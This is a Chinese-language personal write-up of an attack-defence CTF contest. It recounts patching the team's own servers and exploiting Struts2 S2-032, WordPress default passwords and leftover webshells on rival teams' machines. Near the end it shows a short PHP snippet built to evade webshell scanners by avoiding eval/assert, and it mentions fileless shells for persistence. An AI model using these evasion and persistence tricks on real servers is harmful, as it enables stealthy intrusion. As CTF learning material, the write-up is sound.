kerling

flag：方式 curl 10.0.2.1

上去直接先部署360waf 并且把回显改为用js返回上一页 来避免被举报 2333

然后 

cd /var/apache2/www/&&dir

之后发现一个html 和html2然后端口扫描发现一个tomcat 刚开始以为是 反序列化，所以试了很多exp都不行。。。然后被人拿分了 遂看目录

试了几下发现 html 和html2目录分别为一个 wordpress 和一个 kuaifancms（至今不懂 - -） wp发现默认密码 并且被别人使用插件getshell, 查看密码之后 队友也把所有靶机扫完了，接下来直接 用request 自动 检测存在的小马 捡了一波分之后 上无文件马儿巩固权限。当时没有发现html2的对应端口(队友表示没有扫描出端口) 后来无意 从别的队伍口中听到了 8090 然后打开发现是 该端口

先改了后台密码。之后 查看了下 cms 基本很多地方使用的转义 而且基本是字符串类型的带入 自以为没有问题了.

过了下被人疯狂getflag（后来才知道原来是html2出了问题 别人说有注入 -=-真是日了狗了），然后着手发现马儿写在了 config里 - - 删掉以后 下一步 把密码改的超级复杂

后来tomcat出现了问题 发现原来有个web目录，然后 试了下 竟然是s032 ,尴尬之后直接 收了几波分 包括那些 php没有问题的 机子 - - 真爽 但是回头一看又被扣分了 而且扫不到密码。那个时候其实s032 以通过更改structs.xml文件，(具体参照seebug上的修补方法,但是不知道为什么 服务down了,不过官方裁判貌似只关注tomcat的问题- -不管子目录) 

吃了几波分。然后突然想到不能只看php啊 然后穿了个scan.php 上去 对所有文件 进行扫描 - -日了狗 发现有a.zip a.jpg这类文件 全部都解析成了php.... 仔细看了下 发现有个htaccess 文件 遂删除之后 清空upload目录，后来发现别的队伍一神器 具体就是 把$_GET $_POST 等 保存下来 然后 写入一个txt 方便分析。。。而且在别人的服务器上发现了自己的scan.php

然后继续使用 st032扫了好几波分。。。才有队伍发现问题- -

不过好在 原来就考虑过了 因此 用 st执行 命令 把 php目录 所有文件基本都读过 发现小马直接连接然后中自己的脚本 稳迪迪!

后来有几个队伍 重启服务了。。又由于那时候在 考虑 靶机问题(因为 总是 算不够20台主机 所以思考是不是 扫漏了，一直在scan)

回过头才发现 好几个队伍都 重启了服务 ，有些是删除了马儿然后 掉了点机子 不过还好.反手又拿下几台。。后来想了下 换个思路getflag

if(@$POST[a]!="")

echo file_get_content("https://10.0.2.1");

这样无eval assert特征函数 不会被scan 接下来只要 访问一下 getflag

但是由于效率还是不够高- - 操作不过来。。。还是输在自动化啊 - -

最气的是 最后两轮竟然平台爆炸了无法getflag - -(安恒-0-)

所以躺着躺着 然后就 第二了 就游戏结束了- -

总的来说 收获还是有的。。。不过发挥不是很好 。。。包括漏洞自己 没仔细看 wp不小心 没有仔细分析环境(htaccess 还有8090端口) 但是自己写的小套间威力不错啊2333 好多队伍直接过去恢复快照了 23333